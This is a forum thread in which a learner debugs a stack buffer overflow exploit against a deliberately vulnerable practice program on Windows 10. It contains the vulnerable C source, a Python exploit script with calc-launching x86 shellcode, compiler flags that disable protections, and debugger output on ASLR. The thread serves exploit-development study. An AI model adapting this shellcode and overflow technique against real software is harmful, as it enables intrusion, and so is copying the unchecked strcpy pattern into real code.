KR_Nails
(x_212)
May 24, 2019, 11:53pm
1
I am trying to exploit this exercise on windows 10 64 bits, but the executable is 32 bits . however I really exploit the program , but I want to redirect to calc.exe shellcode instead of letsprint , however when I try to inject my own shellcode . it doesnt work
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int copytobuffer(char* input){
char buffer[15];
strcpy (buffer,input);
return 0;
}
void letsprint()
{
printf("Hey!! , you succeeded\n");
exit(0);
}
void main (int argc, char *argv[])
{
int local_variable = 1;
copytobuffer(argv[1]);
exit(0);
}
#!/usr/bin/python
import sys, subprocess, struct
junk = "A" * 27
function = "\x24\x15\x40"
nops = "\x90" * 20
shellcode = ""
shellcode += "\x50\x53\x51\x52\x56\x57\x55\x89"
shellcode += "\xe5\x83\xec\x18\x31\xf6\x56\x6a"
shellcode += "\x63\x66\x68\x78\x65\x68\x57\x69"
shellcode += "\x6e\x45\x89\x65\xfc\x31\xf6\x64"
shellcode += "\x8b\x5e\x30\x8b\x5b\x0c\x8b\x5b"
shellcode += "\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10"
shellcode += "\x89\x5d\xf8\x31\xc0\x8b\x43\x3c"
shellcode += "\x01\xd8\x8b\x40\x78\x01\xd8\x8b"
shellcode += "\x48\x24\x01\xd9\x89\x4d\xf4\x8b"
shellcode += "\x78\x20\x01\xdf\x89\x7d\xf0\x8b"
shellcode += "\x50\x1c\x01\xda\x89\x55\xec\x8b"
shellcode += "\x58\x14\x31\xc0\x8b\x55\xf8\x8b"
shellcode += "\x7d\xf0\x8b\x75\xfc\x31\xc9\xfc"
shellcode += "\x8b\x3c\x87\x01\xd7\x66\x83\xc1"
shellcode += "\x08\xf3\xa6\x74\x0a\x40\x39\xd8"
shellcode += "\x72\xe5\x83\xc4\x26\xeb\x41\x8b"
shellcode += "\x4d\xf4\x89\xd3\x8b\x55\xec\x66"
shellcode += "\x8b\x04\x41\x8b\x04\x82\x01\xd8"
shellcode += "\x31\xd2\x52\x68\x2e\x65\x78\x65"
shellcode += "\x68\x63\x61\x6c\x63\x68\x6d\x33"
shellcode += "\x32\x5c\x68\x79\x73\x74\x65\x68"
shellcode += "\x77\x73\x5c\x53\x68\x69\x6e\x64"
shellcode += "\x6f\x68\x43\x3a\x5c\x57\x89\xe6"
shellcode += "\x6a\x0a\x56\xff\xd0\x83\xc4\x46"
shellcode += "\x5d\x5f\x5e\x5a\x59\x5b\x58\xc3";
payload = junk + function + nops + shellcode
subprocess.call(['traditional_stack.exe', payload])
Your shellcode is not very readable. Do you have mitigations enabled? Where is calc running/stored? We need more information about your environment
dtm
May 25, 2019, 1:03am
3
How did you compile this? using which compiler? If gcc, with which flags? If MSVC++, are you using default flags?
it was compiled like this
gcc.exe -m32 file.c -o file.exe"
, but I add -fno-stack-protector . it doesnt work either
dtm
May 25, 2019, 1:29am
5
Have you tried to figure out why it doesn’t work? Where does it break?
I know I have control over EIP.
#!/usr/bin/python
import sys, subprocess, struct
junk = "A" * 27
eip = "B" * 4
payload = junk + eip
#subprocess.call(['stack-overflow.exe', payload])
f = open("a",'w')
f.write(payload)
if I change my eip for letsprint works, but if I change for my jmp esp (kernelbase) , and shellcode doesnt work.
dtm
May 25, 2019, 1:44am
7
Have you checked kernelbase
with ASLR? Maybe that’s why it’s not working. Are you checking using a debugger? If so, are you starting the process with the debugger or are you attaching?
how can I compile this on visual cl
?
gcc.exe -m32 -fno-stack-protector --no-pie -z stackexec "C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.c" -o "C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.exe"
dtm
May 25, 2019, 2:08am
9
As you said before, you can control eip
so I don’t think your program has the issue. Try running your program and then attaching with a debugger (rather than starting the program with the debugger) and check when you jump to kernelbase
that the address and instructions are correct.
KR_Nails
(x_212)
May 25, 2019, 3:07am
11
0BADF00D -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D Module info :
0BADF00D -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D 0x74a50000 | 0x74c34000 | 0x001e4000 | True | True | True | False | True | 10.0.17134.376 [KERNELBASE.dll] (C:\WINDOWS\System32\KERNELBASE.dll)
0BADF00D 0x77c50000 | 0x77de0000 | 0x00190000 | True | True | True | False | True | 10.0.17134.228 [ntdll.dll] (C:\WINDOWS\SYSTEM32\ntdll.dll)
0BADF00D 0x76460000 | 0x76540000 | 0x000e0000 | True | True | True | False | True | 10.0.17134.376 [KERNEL32.DLL] (C:\WINDOWS\System32\KERNEL32.DLL)
0BADF00D 0x00400000 | 0x0041b000 | 0x0001b000 | False | True | False | False | False | -1.0- [stack-overflow.exe] (C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.exe)
here is how it looks like . I think maybe I create the poc in the wrong way . I just can jump to the function instead of poping a w00t
dtm
May 25, 2019, 3:11am
12
Does your exploit work under manual debugging?
KR_Nails
(x_212)
May 25, 2019, 3:13am
13
it works, but the only thing I can achieve is letsprint instead of poping a calc.
dtm
May 25, 2019, 3:14am
14
Perhaps your shellcode is incorrect? Have you verified if that is working?
KR_Nails
(x_212)
May 25, 2019, 3:16am
15
it works , because I use in windows 7
and it pop a calc.exe
. I also used the windows 10 pop calc and doesnt work. maybe I create in the wrong way this sample.
dtm
May 25, 2019, 3:17am
16
Step through your shellcode in a debugger and find out where it goes wrong.
system
(system)
Closed
June 23, 2019, 11:53pm
17
This topic was automatically closed after 30 days. New replies are no longer allowed.